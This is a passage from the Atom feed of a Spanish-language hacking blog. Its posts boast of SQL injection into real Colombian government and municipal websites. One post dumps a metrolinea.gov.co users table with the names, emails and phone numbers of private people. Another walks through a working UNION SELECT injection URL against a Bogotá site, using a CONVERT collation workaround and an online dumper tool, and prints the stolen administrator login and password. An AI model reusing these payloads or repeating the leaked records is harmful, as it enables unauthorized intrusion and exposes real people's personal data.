&lt;tr&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-04-27 10:31:26&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;19&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-04-27 09:58:35&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;20&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-04-28 06:30:35&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;21&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;Dynamic-IP-1868118132.cable.net.co&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-04-29 05:42:08&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;22&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-04-29 06:19:24&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;23&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-04-29 02:09:55&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;24&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-05-27 08:06:22&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;25&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-06-24 04:11:23&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFF7F2" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;26&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;186.121.45.219&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;2010-06-30 10:11:55&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;1&lt;/span&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;27&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-4400903473194683703?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/9T1J3RnfM_p889fPuzMopewHWNI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/9T1J3RnfM_p889fPuzMopewHWNI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/9T1J3RnfM_p889fPuzMopewHWNI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/9T1J3RnfM_p889fPuzMopewHWNI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/srQXTt8iWBE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/4400903473194683703/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/07/isql-en-contraloriadelatlanticogovco.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/4400903473194683703?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/4400903473194683703?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/srQXTt8iWBE/isql-en-contraloriadelatlanticogovco.html" title="iSQL en contraloriadelatlantico.gov.co" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/07/isql-en-contraloriadelatlanticogovco.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkABQnYyeip7ImA9WhdTEUg.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-2809377590035983891</id><published>2011-07-08T11:45:00.000-07:00</published><updated>2011-07-08T11:45:53.892-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-08T11:45:53.892-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="iSQL" /><title>iSQL en metrolinea.gov.co</title><content type="html">&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://t0.gstatic.com/images?q=tbn:ANd9GcQL9MpnEhrM25TtIiFM6PY5hR6aK-62rR6f32nokFqUyVUG_lVI&amp;amp;t=1" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="91" src="http://t0.gstatic.com/images?q=tbn:ANd9GcQL9MpnEhrM25TtIiFM6PY5hR6aK-62rR6f32nokFqUyVUG_lVI&amp;amp;t=1" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span class="Apple-style-span" style="font-family: monospace; font-size: x-small; white-space: pre-wrap;"&gt;&lt;i&gt;Sistema de trasporte masivo de Bucaramanga y su Área metropolitana&lt;/i&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;b&gt;Tablas:&lt;/b&gt;&lt;br /&gt;
&lt;pre class="brush: sql"&gt;usuarios 
tipovehiculo 
tipousuario 
ruta 
relusuariosruta 
relusuarioshorarioruta 
paginasamigas 
pagina 
ocupacion 
noticiasninos 
noticiashome 
noticias 
modulos 
metrocam 
ipencuestas 
institucional 
imagenesninos 
imagenesmedioamb 
imagenesbanner 
horarioruta 
historial 
glosario 
fotos 
fondopagina 
faq 
documentos 
cuestionariorespuesta 
cuestionario 
contactenos 
cargo 
boletin 
banner 
asunto 
album 
Respuesta
Pregunta
&lt;/pre&gt;&lt;br /&gt;
&lt;b&gt;Tabla:&lt;/b&gt; usuarios&lt;br /&gt;
&lt;pre class="brush: sql"&gt;admincsv info@intelconex.com 6345850  Conexiones Inteligentes S.A.S.
JMedina sistemas@metrolinea.gov.co 6430807 ext 119 3175416747 Jorge Medina Perez
cgarcia@metrolinea.gov.co 6992275 315 7823264 Clara In�s Garc�a Monsalve
castricoliliana@gmail.com 6433865 3188044148 Liliana Patricia Castro Carre�o
camanpulido@hotmail.com  3184861388 Camilo Andr�s Pulido Rey
gmb_17@hotmail.com 6913895 3003776952 Gerson Martinez Baena
plata_rey@hotmail.com  3158746513 Maria Elizabeth Plata Rey
gabo_1996@hotmail.com 6552758 3155140757 gabriel leonardo ortiz vargas
fannyelieth713@yahoo.es  3185255894 fanny elieth ni�o castellanos
fabianamad@hotmail.com  3204470624 EDUARD FABIAN MAZO AMADO
alejandra lizcano
eernesto12@hotmail.com 6324586 3124262670 edwin ernesto martinez parra
eernesto12@hotmail.com 6324586 3124262670 edwin ernesto martinez parra
mandrevas@hotmail.com 3167581288 3167581288 marco andres vasquez mendez
americadecali82@hotmail.com 3005760345 3005760345 Julian Andres Sedano Duarte
jairmezadg@hotmail.com  3187148600 Jair Fernando Mesa Romero
nicolas_bernal@hotmail.com 6832638 3002071431 Juan Nicolas Bernal Yhama
odavidcastellanos_1015@hotmail.com 3186410181 3186410181 Omar David Castellanos Herrera
ortizsa@live.com 6991776 3123760884 SERGIO AUGUSTO ORTIZ BARRAZA
jack2011_@hotmail.com 6192138 3202068145 jairo andres correa gomez
disturbio19@hotmail.com 6427860-6449008  SERGIO ENRIQUE MENDEZ FERNANDEZ
andrerev@gmail.com 6360620 3172130873 N�colas Andr� Dur�n Garz�n
damianikus@hotmail.com 6576942 3104806325 damian julian
zulianny622@hotmail.com 6470584 3187284840 zulema arengas
BETO8689@HOTMAIL.COM  3143106711 LUIS ALBERTO ALDANA PORTILLA
j-ricardo1995@hotmail.com 6491506 3172553554 jhojan ricardo pinto rincon
cris1214_6@hotmail.com 6913173 3175310775 cristian serrano
milago0874@gmail.com 6323024 3164677976 Eduard Milander Gomez Ayala
acened1@gmail.com 6460413 3204289580 Acened Mancilla Ruiz
isaijaimes@hotmail.com 6585210 3162961403 isai jaimes sepulveda
cecilia8910@gmail.com 639-26-59 317-815-0228 CILIA DEL ROSARIO TORRES DE JIMENEZ
emirey3020@hotmail.com 6585210 3168211456 emilce jaimes sepulveda
wasr.el.loko@gmail.com  3188878518 Wuilfret Arpidio Sanchez Ramirez
carlld12@hotmail.com  3173911253 Carlos Diaz
agusflo2009@hotmail.com 6499970 3163276062 AGUSTIN DEMETRIO FLOREZ ESCALANTE
marloncobain@msn.com  3167695026 Marlon H. Correa Ardila&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-2809377590035983891?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/2VThHf4gFzGbmtA4WAllla0WW-c/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/2VThHf4gFzGbmtA4WAllla0WW-c/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/2VThHf4gFzGbmtA4WAllla0WW-c/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/2VThHf4gFzGbmtA4WAllla0WW-c/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/jN3gBjB97_M" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/2809377590035983891/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/07/isql-en-metrolineagovco.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/2809377590035983891?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/2809377590035983891?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/jN3gBjB97_M/isql-en-metrolineagovco.html" title="iSQL en metrolinea.gov.co" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/07/isql-en-metrolineagovco.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkAHQHo5cSp7ImA9WhdTEUw.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-5509855258586812708</id><published>2011-07-08T00:38:00.000-07:00</published><updated>2011-07-08T00:38:51.429-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-08T00:38:51.429-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="iSQL" /><category scheme="http://www.blogger.com/atom/ns#" term="Intrusiones" /><title>Curaduría urbana de Bogota HACKED!</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.curaduria1bogota.com/images/logo_sip.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="76" src="http://www.curaduria1bogota.com/images/logo_sip.gif" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Sin nada que hacer y la perra de &lt;b&gt;@Progressive-Death&lt;/b&gt; OFF, me puse a mirar algunas cosas en la&amp;nbsp;Internet&amp;nbsp;y me tope con esta pagina, después de algunos testeos básicos que suelo hacer, me doy cuenta que es vulnerable a inyección de código SQL, así que intento sacarle provecho a ver que información encuentro, pero ocurre un problema,&amp;nbsp;&lt;i&gt;-jamás en mi vida había estado de frente con este error-&lt;/i&gt;, no se porque mierda salia&lt;/div&gt;&lt;pre class="brush: sql"&gt;#
Error: Illegal mix of collations for operation 'UNION'
#&lt;/pre&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Entonces me pongo a buscar y pensando en la frase que todos dicen, &lt;i&gt;-cada día se aprende algo diferente-&lt;/i&gt;, encuentro la solución, os la explicaré.&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;Porque suele aparecer este error?&lt;/b&gt;&lt;br /&gt;
&lt;blockquote&gt;&lt;div style="text-align: justify;"&gt;Sintácticamente la consulta que hemos realizado es correcta, pero problema esta en el tipo de codificación que se encuentra en el motor de base de datos, el cual intentar comparar dos cadenas codificadas con diferente juego de caracteres.&lt;/div&gt;&lt;/blockquote&gt;&lt;b&gt;Solución,&lt;/b&gt;&lt;br /&gt;
&lt;blockquote&gt;&lt;div style="text-align: justify;"&gt;Basta sólo con convertir nuestra cadena inyectada a la misma que se encuentra en uso por el motor de base de datos, en nuestro caso sería:&lt;/div&gt;&lt;pre class="brush: sql"&gt;#
[...] CONVERT(table_name USING latin1) [...]
#&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;Con esta conversión ya podemos printear las tablas.&lt;/div&gt;&lt;/blockquote&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Como quiero automatizar todo, &lt;i&gt;-me da pereza hacerlo manuelmente-&lt;/i&gt;, me puse a buscar algo que realizará esta tarea rapidamente, y me encontre con la web &lt;a href="http://scan.subhashdasyam.com/dumper.php"&gt;scan.subhashdasyam.com/dumper.php&lt;/a&gt;, que permite realizar un dumpeo de datos con tan sólo ingresar correctamente los parámetros de la inyección &lt;i&gt;-no entraré en detalle sobre el uso de esta herramienta-&lt;/i&gt;.&lt;br /&gt;
&lt;br /&gt;
Os dejaré un ejemplo de como use esta herramienta para que vea como es la configuración de los parámetros.&lt;/div&gt;&lt;br /&gt;
&lt;pre class="brush: sql"&gt;#
http://www.curaduria1bogota.com/noticias.php?cat_id=-1+UNION+ALL+SELECT+1,concat(0x7375626861736864617379616d2e636f6d,CONVERT(id+USING+latin1),0x3a,CONVERT(nombre+USING+latin1),0x3a,CONVERT(login+USING+latin1),0x3a,CONVERT(pwd+USING+latin1),0x3a,CONVERT(email+USING+latin1),0x3a,CONVERT(estado+USING+latin1),0x7375626861736864617379616d2e636f6d),3+FROM+seg_usuarios+limit+
#&lt;/pre&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;El resultado es:&lt;/div&gt;&lt;pre class="brush: sql"&gt;#
1:Administrador:123456:123456:diazpernial@yahoo.com:A
#&lt;/pre&gt;&lt;br /&gt;
A ver si alguna vez te encuentro ON &lt;b&gt;@Progressive-Death&lt;/b&gt;, siempre te pierdes. &lt;br /&gt;
&lt;br /&gt;
Feliz HACK!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-5509855258586812708?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/U0rfM70vwOxt8ECeDkQ1o9m6G8s/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/U0rfM70vwOxt8ECeDkQ1o9m6G8s/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/U0rfM70vwOxt8ECeDkQ1o9m6G8s/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/U0rfM70vwOxt8ECeDkQ1o9m6G8s/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/BboJ-MrzcL4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/5509855258586812708/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/07/curaduria-urbana-de-bogota-hacked.html#comment-form" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/5509855258586812708?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/5509855258586812708?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/BboJ-MrzcL4/curaduria-urbana-de-bogota-hacked.html" title="Curaduría urbana de Bogota HACKED!" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>1</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/07/curaduria-urbana-de-bogota-hacked.html</feedburner:origLink></entry></feed>

